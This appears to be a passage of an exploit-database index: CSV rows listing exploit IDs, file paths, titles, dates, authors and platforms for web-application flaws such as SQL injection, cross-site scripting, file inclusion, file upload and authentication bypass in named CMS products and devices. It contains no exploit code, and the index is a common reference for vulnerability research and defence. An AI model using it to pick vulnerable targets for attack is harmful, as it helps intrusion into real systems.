-33629,exploits/ios/webapps/33629.txt,"Privacy Pro 1.2 HZ iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,56380 -33630,exploits/ios/webapps/33630.txt,"TigerCom My Assistant 1.1 iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8080 -33631,exploits/ios/webapps/33631.txt,"AllReader 1.0 iOS - Multiple Vulnerabilities",2014-06-03,Vulnerability-Lab,ios,webapps,8080 -33632,exploits/ios/webapps/33632.txt,"Bluetooth Photo-File Share 2.1 iOS - Multiple Vulnerabilities",2014-06-03,Vulnerability-Lab,ios,webapps,8080 -33633,exploits/windows/webapps/33633.txt,"IPSwitch IMail Server WEB client 12.4 - Persistent Cross-Site Scripting",2014-06-03,Peru,windows,webapps, -33644,exploits/php/webapps/33644.txt,"Basic-CMS - 'nav_id' Cross-Site Scripting",2010-02-12,Red-D3v1L,php,webapps, -33641,exploits/php/webapps/33641.txt,"Joomla! Component F!BB 1.5.96 RC - SQL Injection / HTML Injection",2009-09-17,"Jeff Channell",php,webapps, -33643,exploits/php/webapps/33643.txt,"CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting",2010-02-12,"Beenu Arora",php,webapps, -33647,exploits/asp/webapps/33647.txt,"Portrait Software Portrait Campaign Manager 4.6.1.22 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-16,"Roel Schouten",asp,webapps, -33649,exploits/php/webapps/33649.txt,"BGSvetionik BGS CMS - 'search' Cross-Site Scripting",2010-02-16,hacker@sr.gov.yu,php,webapps, -33650,exploits/php/webapps/33650.txt,"Extreme Mobster - 'login' Cross-Site Scripting",2010-02-16,indoushka,php,webapps, -33651,exploits/php/webapps/33651.txt,"EziScript Google Page Rank 1.1 - Cross-Site Scripting",2010-02-16,sarabande,php,webapps, -33652,exploits/php/webapps/33652.txt,"New-CMS 1.08 - Multiple Local File Inclusion / HTML Injection Vulnerabilities",2010-02-18,"Alberto Fontanella",php,webapps, -33654,exploits/php/webapps/33654.py,"Madness Pro 1.14 - Persistent Cross-Site Scripting",2014-06-06,bwall,php,webapps, -33655,exploits/php/webapps/33655.py,"Madness Pro 1.14 - SQL Injection",2014-06-06,bwall,php,webapps, -33656,exploits/php/webapps/33656.txt,"XlentProjects SphereCMS 1.1 - 'archive.php' SQL Injection",2010-02-18,"AmnPardaz Security Research Team",php,webapps, -33657,exploits/php/webapps/33657.txt,"Subex Nikira Fraud Management System GUI - 'message' Cross-Site Scripting",2010-02-18,thebluegenius,php,webapps, -33658,exploits/php/webapps/33658.txt,"Social Web CMS 2 - 'index.php' Cross-Site Scripting",2010-02-19,GoLdeN-z3r0,php,webapps, -40343,exploits/php/webapps/40343.txt,"CumulusClips 2.4.1 - Multiple Vulnerabilities",2016-09-07,kor3k,php,webapps,80 -33659,exploits/php/webapps/33659.txt,"Joomla! Component com_recipe - Multiple SQL Injections",2010-02-20,FL0RiX,php,webapps, -33660,exploits/php/webapps/33660.txt,"vBulletin 4.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-20,indoushka,php,webapps, -33661,exploits/php/webapps/33661.txt,"Galerie Dezign-Box - Multiple Input Validation Vulnerabilities",2010-02-22,indoushka,php,webapps, -33665,exploits/php/webapps/33665.txt,"Softbiz Jobs - 'sbad_type' Cross-Site Scripting",2010-02-23,"pratul agrawal",php,webapps, -33675,exploits/jsp/webapps/33675.txt,"IBM (Multiple Products) - Login Page Cross-Site Scripting",2010-02-25,"Oren Hafif",jsp,webapps, -33676,exploits/php/webapps/33676.txt,"Newbie CMS 0.0.2 - Insecure Cookie Authentication Bypass",2010-02-25,JIKO,php,webapps, -33678,exploits/jsp/webapps/33678.txt,"ARISg 5.0 - 'wflogin.jsp' Cross-Site Scripting",2010-02-26,"Yaniv Miron",jsp,webapps, -33673,exploits/php/webapps/33673.pl,"Joomla! Component HD FLV Player - 'id' SQL Injection",2010-02-24,kaMtiEz,php,webapps, -33674,exploits/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 - Multiple Local File Inclusions",2010-02-24,JIKO,php,webapps, -33679,exploits/php/webapps/33679.txt,"TRUC 0.11 - 'login_reset_password_page.php' Cross-Site Scripting",2010-02-28,snakespc,php,webapps, -33680,exploits/php/webapps/33680.txt,"Open Educational System 0.1 Beta - 'CONF_INCLUDE_PATH' Multiple Remote File Inclusions",2010-02-28,cr4wl3r,php,webapps, -33681,exploits/php/webapps/33681.txt,"SLAED CMS 4 - Installation Script Unauthorized Access",2010-02-27,indoushka,php,webapps, -33683,exploits/php/webapps/33683.txt,"Article Friendly - 'Filename' Local File Inclusion",2010-03-01,"pratul agrawal",php,webapps, -33684,exploits/php/webapps/33684.txt,"Blax Blog 0.1 - 'girisyap.php' SQL Injection",2010-03-01,cr4wl3r,php,webapps, -33685,exploits/php/webapps/33685.html,"DeDeCMS 5.5 - '_SESSION[dede_admin_id]' Authentication Bypass",2010-03-01,"Wolves Security Team",php,webapps, -33687,exploits/java/webapps/33687.txt,"Sparta Systems TrackWise EQms - Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",java,webapps, -33688,exploits/php/webapps/33688.txt,"Discuz! 6.0 - 'uid' Cross-Site Scripting",2010-03-02,"lis cker",php,webapps, -33691,exploits/jsp/webapps/33691.txt,"Comptel Provisioning and Activation - 'index.jsp?error_msg_parameter' Cross-Site Scripting",2010-03-04,thebluegenius,jsp,webapps, -33706,exploits/php/webapps/33706.txt,"Drupal < 5.22/6.16 - Multiple Vulnerabilities",2010-03-04,"David Rothstein",php,webapps, -33704,exploits/asp/webapps/33704.txt,"BBSXP 2008 - 'ShowPost.asp' Cross-Site Scripting",2010-03-04,Liscker,asp,webapps, -33697,exploits/php/webapps/33697.txt,"eFront 3.6.14.4 - 'surname' Persistent Cross-Site Scripting",2014-06-09,"shyamkumar somana",php,webapps,80 -33699,exploits/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",php,webapps,80 -33700,exploits/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 < 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80 -33702,exploits/php/webapps/33702.txt,"ZeroCMS 1.0 - 'zero_view_article.php' SQL Injection",2014-06-10,LiquidWorm,php,webapps,80 -33714,exploits/php/webapps/33714.txt,"SHOUTcast DNAS 2.2.1 - Persistent Cross-Site Scripting",2014-06-11,rob222,php,webapps, -33715,exploits/asp/webapps/33715.txt,"Spectrum Software WebManager CMS - 'pojam' Cross-Site Scripting",2010-03-05,hacker@sr.gov.yu,asp,webapps, -33716,exploits/php/webapps/33716.txt,"Saskia's ShopSystem - 'id' Local File Inclusion",2010-03-05,cr4wl3r,php,webapps, -33717,exploits/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,multiple,webapps, -33718,exploits/php/webapps/33718.txt,"phpCOIN 1.2.1 - 'mod' Local File Inclusion",2010-03-06,_mlk_,php,webapps, -33720,exploits/asp/webapps/33720.txt,"Pre E-Learning Portal - 'search_result.asp' SQL Injection",2010-03-08,NoGe,asp,webapps, -33721,exploits/asp/webapps/33721.txt,"Max Network Technology BBSMAX 4.2 - 'post.aspx' Cross-Site Scripting",2010-03-08,Liscker,asp,webapps, -33722,exploits/asp/webapps/33722.txt,"ASPCode CMS 1.5.8 - 'default.asp' Multiple Cross-Site Scripting Vulnerabilities",2010-03-08,"Alberto Fontanella",asp,webapps, -33723,exploits/php/webapps/33723.html,"KDPics 1.18 - '/admin/index.php' Authentication Bypass",2010-03-08,snakespc,php,webapps, -33724,exploits/php/webapps/33724.txt,"OpenCart 1.3.2 - 'page' SQL Injection",2010-03-07,"Andrés Gómez",php,webapps, -33726,exploits/php/webapps/33726.txt,"TikiWik < 4.2 - Multiple Vulnerabilities",2010-03-09,"Mateusz Drygas",php,webapps, -33727,exploits/php/webapps/33727.txt,"wh-em.com upload 7.0 - Insecure Cookie Authentication Bypass",2010-02-16,indoushka,php,webapps, -33728,exploits/asp/webapps/33728.txt,"IBM ENOVIA SmarTeam - 'LoginPage.aspx' Cross-Site Scripting",2010-03-09,Lament,asp,webapps, -33730,exploits/asp/webapps/33730.txt,"Max Network Technology BBSMAX 4.2 - 'threadid' Cross-Site Scripting",2010-03-10,Liscker,asp,webapps, -33731,exploits/multiple/webapps/33731.txt,"Friendly Technologies TR-069 ACS 2.8.9 - Login SQL Injection",2010-03-10,"Yaniv Miron",multiple,webapps, -33732,exploits/php/webapps/33732.txt,"60cycleCMS - 'select.php' Multiple HTML Injection Vulnerabilities",2010-03-10,"pratul agrawal",php,webapps, -33734,exploits/php/webapps/33734.txt,"DDL CMS 2.1 - 'blacklist.php' Cross-Site Scripting",2010-03-10,ITSecTeam,php,webapps, -33736,exploits/aix/webapps/33736.php,"Plesk 10.4.4/11.0.9 - SSO XML External Entity / Cross-Site Scripting Injection",2014-06-13,"BLacK ZeRo",aix,webapps, -33760,exploits/multiple/webapps/33760.txt,"(Multiple Products) - 'banner.swf' Cross-Site Scripting",2010-03-15,MustLive,multiple,webapps, -33761,exploits/asp/webapps/33761.txt,"Pars CMS - 'RP' Multiple SQL Injections",2010-03-15,Isfahan,asp,webapps, -33740,exploits/hardware/webapps/33740.txt,"Yealink VoIP Phone SIP-T38G - Local File Inclusion",2014-06-13,Mr.Un1k0d3r,hardware,webapps, -33743,exploits/php/webapps/33743.py,"ZeroCMS 1.0 - 'zero_transact_user.php' Handling Privilege Escalation",2014-06-13,"Tiago Carvalho",php,webapps, -33759,exploits/multiple/webapps/33759.txt,"DirectAdmin 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting",2010-03-14,r0t,multiple,webapps, -33748,exploits/php/webapps/33748.txt,"AneCMS 1.0 - 'index.php' Multiple HTML Injection Vulnerabilities",2010-03-11,"pratul agrawal",php,webapps, -33749,exploits/php/webapps/33749.txt,"ARTIS ABTON CMS - Multiple SQL Injections",2010-03-11,MustLive,php,webapps, -33751,exploits/php/webapps/33751.txt,"CodeIgniter 1.0 - 'BASEPATH' Multiple Remote File Inclusions",2010-03-11,eidelweiss,php,webapps, -33753,exploits/php/webapps/33753.txt,"Easynet4u Forum Host - 'topic.php' SQL Injection",2010-03-12,Pr0T3cT10n,php,webapps, -33754,exploits/php/webapps/33754.txt,"pMyAdmin 3.3.5.1 - 'db_create.php' Cross-Site Scripting",2010-03-12,Liscker,php,webapps, -40351,exploits/php/webapps/40351.txt,"Jobberbase 2.0 - Multiple Vulnerabilities",2016-09-08,"Ross Marks",php,webapps,80 -33756,exploits/php/webapps/33756.txt,"Joomla! Component com_seek - 'id' SQL Injection",2010-03-13,"DevilZ TM",php,webapps, -33757,exploits/php/webapps/33757.txt,"Joomla! Component com_d-greinar - 'maintree' Cross-Site Scripting",2010-03-13,"DevilZ TM",php,webapps, -33758,exploits/asp/webapps/33758.txt,"Zigurrat Farsi CMS - '/manager/textbox.asp' SQL Injection",2010-03-15,Isfahan,asp,webapps, -33762,exploits/php/webapps/33762.txt,"Andromeda 1.9.2 - 's' Cross-Site Scripting / Session Fixation",2010-03-15,indoushka,php,webapps, -33763,exploits/php/webapps/33763.txt,"Domain Verkaus & Auktions Portal - 'index.php' SQL Injection",2010-03-15,"Easy Laster",php,webapps, -33764,exploits/multiple/webapps/33764.txt,"Dojo Toolkit 1.4.1 - '/dijit/tests/_testCommon.js?theme' Cross-Site Scripting",2010-03-15,"Adam Bixby",multiple,webapps, -33765,exploits/multiple/webapps/33765.txt,"Dojo Toolkit 1.4.1 - '/doh/runner.html' Multiple Cross-Site Scripting Vulnerabilities",2010-03-15,"Adam Bixby",multiple,webapps, -33766,exploits/php/webapps/33766.txt,"Joomla! Component com_as - 'catid' SQL Injection",2010-03-16,N2n-Hacker,php,webapps, -33787,exploits/php/webapps/33787.txt,"RepairShop2 - 'index.php?Prod' Cross-Site Scripting",2010-03-23,kaMtiEz,php,webapps, -33769,exploits/php/webapps/33769.txt,"eFront 3.5.5 - 'langname' Local File Inclusion",2010-03-17,7Safe,php,webapps, -33771,exploits/php/webapps/33771.txt,"Joomla! Component com_alert - 'q_item' SQL Injection",2010-03-17,N2n-Hacker,php,webapps, -33772,exploits/php/webapps/33772.txt,"PHPBB2 Plus 1.53 - 'kb.php' SQL Injection",2010-03-17,Gamoscu,php,webapps, -33773,exploits/php/webapps/33773.txt,"tenfourzero.net Shutter 0.1.4 - 'admin.html' Multiple SQL Injections",2010-03-18,blake,php,webapps, -33776,exploits/php/webapps/33776.txt,"Kempt SiteDone 2.0 - '/detail.php' Cross-Site Scripting / SQL Injection",2010-03-18,d3v1l,php,webapps, -33777,exploits/php/webapps/33777.txt,"PHPWind 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-03-19,Liscker,php,webapps, -33779,exploits/jsp/webapps/33779.txt,"agXchange ESM - 'ucschcancelproc.jsp' Open Redirection",2010-03-22,Lament,jsp,webapps, -33781,exploits/php/webapps/33781.txt,"Lussumo Vanilla 1.1.10 - 'definitions.php' Multiple Remote File Inclusions",2010-03-23,eidelweiss,php,webapps, -33782,exploits/php/webapps/33782.txt,"PHPKIT 1.6.x - 'b-day.php' Addon SQL Injection",2010-03-22,n3w7u,php,webapps, -33784,exploits/php/webapps/33784.txt,"vBulletin 4.0.2 - Search Cross-Site Scripting",2010-03-19,5ubzer0,php,webapps, -33785,exploits/jsp/webapps/33785.txt,"agXchange ESM - 'ucquerydetails.jsp' Cross-Site Scripting",2010-03-23,Lament,jsp,webapps, -33788,exploits/php/webapps/33788.pl,"PHPAuthent 0.2.1 - 'useradd.php' Multiple HTML Injection Vulnerabilities",2010-03-23,Yoyahack,php,webapps, -33792,exploits/hardware/webapps/33792.txt,"Motorola SBG901 Wireless Modem - Cross-Site Request Forgery",2014-06-17,"Blessen Thomas",hardware,webapps, -33793,exploits/php/webapps/33793.txt,"Kasseler CMS News Module - 'id' SQL Injection",2010-03-23,Palyo34,php,webapps, -33794,exploits/php/webapps/33794.txt,"SpringSource (Multiple Products) - Multiple HTML Injection Vulnerabilities",2010-03-23,"Aaron Kulick",php,webapps, -33795,exploits/php/webapps/33795.txt,"Joomla! Component com_aml_2 - 'art' SQL Injection",2010-03-23,Metropolis,php,webapps, -33796,exploits/php/webapps/33796.txt,"Joomla! Component com_cb - 'cat' SQL Injection",2010-03-23,"DevilZ TM",php,webapps, -33797,exploits/php/webapps/33797.txt,"Joomla! Component com_jresearch - 'Controller' Local File Inclusion",2010-03-24,"Chip d3 bi0s",php,webapps, -33803,exploits/hardware/webapps/33803.txt,"ZTE WXV10 W300 - Multiple Vulnerabilities",2014-06-18,"Osanda Malith",hardware,webapps, -34141,exploits/php/webapps/34141.txt,"AneCMS 1.x - '/modules/blog/index.php' SQL Injection",2010-06-11,"High-Tech Bridge SA",php,webapps, -33976,exploits/php/webapps/33976.html,"Saurus CMS 4.7 - 'edit.php' Cross-Site Scripting",2010-05-11,"High-Tech Bridge SA",php,webapps, -33809,exploits/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,php,webapps, -33812,exploits/php/webapps/33812.txt,"Joomla! Component com_weblinks - 'id' SQL Injection",2010-03-29,"Pouya Daneshmand",php,webapps, -33813,exploits/php/webapps/33813.html,"WordPress Plugin Fuctweb CapCC 1.0 - 'plugins.php' SQL Injection",2008-12-13,MustLive,php,webapps, -33814,exploits/php/webapps/33814.txt,"Piwik 0.5.5 - 'form_url' Cross-Site Scripting",2010-03-31,garwga,php,webapps, -33815,exploits/php/webapps/33815.txt,"OSSIM 2.2.1 - '$_SERVER['PHP_SELF']' Cross-Site Scripting",2010-03-31,"CONIX Security",php,webapps, -33818,exploits/php/webapps/33818.txt,"web2Project 3.1 - Multiple Vulnerabilities",2014-06-19,"High-Tech Bridge SA",php,webapps,80 -33820,exploits/php/webapps/33820.txt,"PotatoNews 1.0.2 - 'nid' Multiple Local File Inclusions",2010-04-07,mat,php,webapps, -33821,exploits/php/webapps/33821.html,"n-cms-equipe 1.1c.Debug - Multiple Local File Inclusions",2010-02-24,ITSecTeam,php,webapps, -33822,exploits/hardware/webapps/33822.sh,"D-Link DSL-2760U-E1 - Persistent Cross-Site Scripting",2014-06-21,"Yuval tisf Nativ",hardware,webapps, -33853,exploits/php/webapps/33853.txt,"Kleophatra CMS 0.1.1 - 'module' Cross-Site Scripting",2010-04-19,anT!-Tr0J4n,php,webapps, -33825,exploits/asp/webapps/33825.txt,"Ziggurat Farsi CMS - 'id' Cross-Site Scripting",2010-04-15,"Pouya Daneshmand",asp,webapps, -33827,exploits/php/webapps/33827.txt,"Istgah For Centerhost - 'view_ad.php' Cross-Site Scripting",2010-04-07,indoushka,php,webapps, -33830,exploits/php/webapps/33830.txt,"Lunar CMS 3.3 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2014-06-21,LiquidWorm,php,webapps, -33832,exploits/php/webapps/33832.txt,"TANDBERG Video Communication Server 4.2.1/4.3.0 - Multiple Remote Vulnerabilities",2010-04-12,"Jon Hart",php,webapps, -33833,exploits/php/webapps/33833.txt,"Blog System 1.x - Multiple Input Validation Vulnerabilities",2010-04-12,cp77fk4r,php,webapps, -33834,exploits/php/webapps/33834.txt,"Vana CMS - 'Filename' Arbitrary File Download",2010-04-13,"Pouya Daneshmand",php,webapps, -33835,exploits/php/webapps/33835.txt,"AneCMS 1.0 - Multiple Local File Inclusions",2010-04-12,"AmnPardaz Security Research Team",php,webapps, -33840,exploits/asp/webapps/33840.txt,"Ziggurat Farsi CMS - 'bck' Directory Traversal",2010-04-15,"Pouya Daneshmand",asp,webapps, -33857,exploits/php/webapps/33857.txt,"e107 0.7.x - '/e107_admin/banner.php' SQL Injection",2010-04-21,"High-Tech Bridge SA",php,webapps, -33997,exploits/php/webapps/33997.txt,"NPDS REvolution 10.02 - 'download.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps, -33998,exploits/php/webapps/33998.html,"Joomla! Component JComments 2.1 - 'ComntrNam' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps, -33846,exploits/php/webapps/33846.txt,"ZeroCMS 1.0 - 'zero_transact_article.php' SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps, -33851,exploits/php/webapps/33851.txt,"Multiple WordPress Plugins (TimThumb 2.8.13 / WordThumb 1.07) - 'WebShot' Remote Code Execution",2014-06-24,@u0x,php,webapps, -33854,exploits/php/webapps/33854.txt,"vBulletin Two-Step External Link Module - 'externalredirect.php' Cross-Site Scripting",2010-04-20,"Edgard Chammas",php,webapps, -33881,exploits/php/webapps/33881.txt,"PowerEasy 2006 - 'ComeUrl' Cross-Site Scripting",2010-04-24,Liscker,php,webapps, -33856,exploits/php/webapps/33856.txt,"Viennabux Beta! - 'cat' SQL Injection",2010-04-09,"Easy Laster",php,webapps, -33858,exploits/php/webapps/33858.txt,"DBSite wb CMS - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-04-21,The_Exploited,php,webapps, -34146,exploits/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",php,webapps, -34147,exploits/php/webapps/34147.txt,"JForum 2.1.8 - 'Username' Cross-Site Scripting",2010-06-06,"Adam Baldwin",php,webapps, -33866,exploits/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password Cross-Site Request Forgery",2014-06-25,nopesled,hardware,webapps, -33867,exploits/php/webapps/33867.txt,"Lunar CMS 3.3 - Unauthenticated Remote Command Execution",2014-06-25,LiquidWorm,php,webapps, -34142,exploits/php/webapps/34142.txt,"MODx 1.0.3 - 'index.php' Multiple SQL Injections",2010-06-14,"High-Tech Bridge SA",php,webapps, -33870,exploits/php/webapps/33870.txt,"FlashCard 2.6.5 - 'id' Cross-Site Scripting",2010-04-22,Valentin,php,webapps, -33874,exploits/php/webapps/33874.txt,"Ektron CMS400.NET 7.5.2 - Multiple Vulnerabilities",2010-04-26,"Richard Moore",php,webapps, -33875,exploits/php/webapps/33875.txt,"HuronCMS - 'index.php' Multiple SQL Injections",2010-03-30,mat,php,webapps, -33882,exploits/php/webapps/33882.txt,"CyberCMS - 'faq.php' SQL Injection",2009-11-26,hc0de,php,webapps, -33883,exploits/php/webapps/33883.txt,"Kasseler CMS 2.0.5 - 'index.php' Cross-Site Scripting",2010-04-26,indoushka,php,webapps, -33884,exploits/php/webapps/33884.txt,"Zikula Application Framework 1.2.2 - 'ZLanguage.php?lang' Cross-Site Scripting",2010-04-13,"High-Tech Bridge SA",php,webapps, -33885,exploits/php/webapps/33885.txt,"Zikula Application Framework 1.2.2 - 'index.php?func' Cross-Site Scripting",2010-04-13,"High-Tech Bridge SA",php,webapps, -33887,exploits/cgi/webapps/33887.txt,"Mailspect Control Panel 4.0.5 - Multiple Vulnerabilities",2014-06-27,"Onur Alanbel (BGA)",cgi,webapps, -33888,exploits/php/webapps/33888.txt,"ProArcadeScript - 'search.php' Cross-Site Scripting",2010-04-27,Sid3^effects,php,webapps, -33889,exploits/php/webapps/33889.txt,"SmartBlog 1.3 - SQL Injection / Cross-Site Scripting",2010-04-27,indoushka,php,webapps, -33894,exploits/multiple/webapps/33894.txt,"Python CGIHTTPServer - Encoded Directory Traversal",2014-06-27,"RedTeam Pentesting",multiple,webapps, -33896,exploits/php/webapps/33896.txt,"WordPress Plugin Simple Share Buttons Adder 4.4 - Multiple Vulnerabilities",2014-06-27,dxw,php,webapps,80 -33897,exploits/multiple/webapps/33897.txt,"Endeca Latitude 2.2.2 - Cross-Site Request Forgery",2014-06-27,"RedTeam Pentesting",multiple,webapps, -33906,exploits/php/webapps/33906.txt,"velBox 1.2 - Insecure Cookie Authentication Bypass",2010-04-28,indoushka,php,webapps, -33908,exploits/php/webapps/33908.txt,"Your Articles Directory - Login Option SQL Injection",2010-04-29,Sid3^effects,php,webapps, -33909,exploits/php/webapps/33909.txt,"Tele Data's Contact Management Server 0.9 - 'Username' SQL Injection",2010-04-28,"John Leitch",php,webapps, -33960,exploits/php/webapps/33960.txt,"ECShop 2.7.2 - 'category.php' SQL Injection",2010-05-07,Liscker,php,webapps, -33967,exploits/php/webapps/33967.txt,"Chipmunk NewsLetter 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-20,b0telh0,php,webapps, -33969,exploits/php/webapps/33969.txt,"eFront 3.x - 'ask_chat.php' SQL Injection",2010-05-09,"Stefan Esser",php,webapps, -33970,exploits/php/webapps/33970.txt,"EasyPublish CMS 23.04.2010 - URI Cross-Site Scripting",2010-05-10,"High-Tech Bridge SA",php,webapps, -33913,exploits/php/webapps/33913.html,"osCommerce 3.0a5 - Local File Inclusion / HTML Injection",2010-04-30,"Jordi Chancel",php,webapps, -33914,exploits/php/webapps/33914.txt,"4x CMS - 'login.php' Multiple SQL Injections",2010-03-21,cr4wl3r,php,webapps, -33915,exploits/php/webapps/33915.txt,"Campsite 3.x - 'article_id' SQL Injection",2010-04-30,"Stefan Esser",php,webapps, -33916,exploits/cfm/webapps/33916.txt,"Mango Blog 1.4.1 - '/archives.cfm/search' Cross-Site Scripting",2010-05-03,MustLive,cfm,webapps, -33917,exploits/php/webapps/33917.txt,"Billwerx RC5.2.2 PL2 - 'primary_number' SQL Injection",2010-05-02,indoushka,php,webapps, -33918,exploits/php/webapps/33918.txt,"CF Image Hosting Script 1.1 - 'upload.php' Arbitrary File Upload",2010-05-01,The.Morpheus,php,webapps, -33919,exploits/php/webapps/33919.txt,"NolaPro Enterprise 4.0.5538 - Cross-Site Scripting / SQL Injection",2010-05-01,ekse,php,webapps, -33921,exploits/php/webapps/33921.txt,"IslamSound - Multiple SQL Injections",2010-05-03,JIKO,php,webapps, -33922,exploits/php/webapps/33922.txt,"CH-CMS.ch 2 - Multiple Arbitrary File Upload Vulnerabilities",2010-03-15,EL-KAHINA,php,webapps, -33923,exploits/asp/webapps/33923.txt,"SamaGraph CMS - 'inside.aspx' SQL Injection",2010-03-11,K053,asp,webapps, -33925,exploits/php/webapps/33925.txt,"ecoCMS 18.4.2010 - 'admin.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps, -33953,exploits/php/webapps/33953.txt,"Zurmo CRM - Persistent Cross-Site Scripting",2014-07-02,Provensec,php,webapps,80 -33959,exploits/asp/webapps/33959.txt,"Consona - 'n6plugindestructor.asp' Cross-Site Scripting",2010-05-07,"Ruben Santamarta",asp,webapps, -33954,exploits/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081 -33933,exploits/php/webapps/33933.txt,"ThinkPHP 2.0 - 'index.php' Cross-Site Scripting",2010-02-09,zx,php,webapps, -33934,exploits/php/webapps/33934.txt,"eZoneScripts (Multiple Scripts) - Insecure Cookie Authentication Bypass",2009-02-09,JIKO,php,webapps, -33958,exploits/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 - 'sid' SQL Injection",2010-05-06,"Christophe de la Fuente",cgi,webapps, -33957,exploits/php/webapps/33957.txt,"kloNews 2.0 - 'cat.php' Cross-Site Scripting",2010-01-20,cr4wl3r,php,webapps, -33937,exploits/multiple/webapps/33937.txt,"WordPress Plugin TYPO3 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,multiple,webapps, -33939,exploits/java/webapps/33939.txt,"ShopEx Single 4.5.1 - 'errinfo' Cross-Site Scripting",2010-02-06,cp77fk4r,java,webapps, -33942,exploits/jsp/webapps/33942.txt,"IBM Algorithmics RICOS 4.5.0 < 4.7.0 - Multiple Vulnerabilities",2014-07-01,"SEC Consult",jsp,webapps,80 -33945,exploits/php/webapps/33945.txt,"DeluxeBB 1.x - 'newpost.php' SQL Injection",2010-05-06,"Stefan Esser",php,webapps, -33946,exploits/php/webapps/33946.txt,"EmiratesHost - Insecure Cookie Authentication Bypass",2010-02-01,jago-dz,php,webapps, -33947,exploits/php/webapps/33947.txt,"Last Wizardz - 'id' SQL Injection",2010-01-31,"Sec Attack Team",php,webapps, -33948,exploits/cfm/webapps/33948.txt,"Site Manager 3.0 - 'id' SQL Injection",2010-01-31,"Sec Attack Team",cfm,webapps, -33950,exploits/php/webapps/33950.txt,"HAWHAW - 'newsread.php' SQL Injection",2010-01-31,s4r4d0,php,webapps, -34103,exploits/cgi/webapps/34103.txt,"Barracuda Networks Message Archiver 650 - Persistent Cross-Site Scripting",2014-07-18,Vulnerability-Lab,cgi,webapps,3378 -33972,exploits/php/webapps/33972.txt,"Advanced Poll 2.0 - 'mysql_host' Cross-Site Scripting",2010-05-10,"High-Tech Bridge SA",php,webapps, -33975,exploits/php/webapps/33975.html,"Affiliate Store Builder - 'edit_cms.php' Multiple SQL Injections",2010-05-11,"High-Tech Bridge SA",php,webapps, -33978,exploits/php/webapps/33978.txt,"TomatoCMS 2.0.x - SQL Injection",2010-05-12,"Russ McRee",php,webapps, -33979,exploits/php/webapps/33979.txt,"C99Shell 1.0 Pre-Release build 16 (Web Shell) - 'ch99.php' Cross-Site Scripting",2010-05-19,indoushka,php,webapps, -33982,exploits/php/webapps/33982.txt,"NPDS REvolution 10.02 - 'download.php' SQL Injection",2010-05-13,"High-Tech Bridge SA",php,webapps, -33983,exploits/php/webapps/33983.txt,"Frog CMS 0.9.5 - Arbitrary File Upload",2014-07-06,"Javid Hussain",php,webapps, -33985,exploits/php/webapps/33985.txt,"NPDS REvolution 10.02 - 'topic' Cross-Site Scripting",2010-05-13,"High-Tech Bridge SA",php,webapps, -33986,exploits/php/webapps/33986.txt,"PHP File Uploader - Arbitrary File Upload",2010-01-03,indoushka,php,webapps, -33987,exploits/php/webapps/33987.txt,"PHP Banner Exchange 1.2 - 'signupconfirm.php' Cross-Site Scripting",2010-01-03,indoushka,php,webapps, -33992,exploits/asp/webapps/33992.txt,"Platnik 8.1.1 - Multiple SQL Injections",2010-05-17,podatnik386,asp,webapps, -33993,exploits/php/webapps/33993.txt,"Planet Script 1.x - 'idomains.php' Cross-Site Scripting",2010-05-14,Mr.ThieF,php,webapps, -33994,exploits/php/webapps/33994.txt,"PonVFTP - Insecure Cookie Authentication Bypass",2010-05-17,SkuLL-HackeR,php,webapps, -33995,exploits/multiple/webapps/33995.txt,"Blaze Apps 1.x - SQL Injection / HTML Injection",2010-01-19,"AmnPardaz Security Research Team",multiple,webapps, -33996,exploits/ios/webapps/33996.txt,"Photo Org WonderApplications 8.3 iOS - Local File Inclusion",2014-07-07,Vulnerability-Lab,ios,webapps, -33999,exploits/php/webapps/33999.txt,"Mobile Chat 2.0.2 - 'chatsmileys.php' Cross-Site Scripting",2010-01-18,indoushka,php,webapps, -34000,exploits/multiple/webapps/34000.txt,"Serialsystem 1.0.4 Beta - 'list' Cross-Site Scripting",2010-01-18,indoushka,multiple,webapps, -34003,exploits/php/webapps/34003.txt,"Joomla! Component Percha Image Attach 1.1 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps, -34004,exploits/php/webapps/34004.txt,"Joomla! Component Percha Fields Attach 1.0 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps, -34005,exploits/php/webapps/34005.txt,"Joomla! Component Percha Downloads Attach 1.1 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps, -34006,exploits/php/webapps/34006.txt,"Joomla! Component Percha Gallery 1.6 Beta - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps, -34007,exploits/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps, 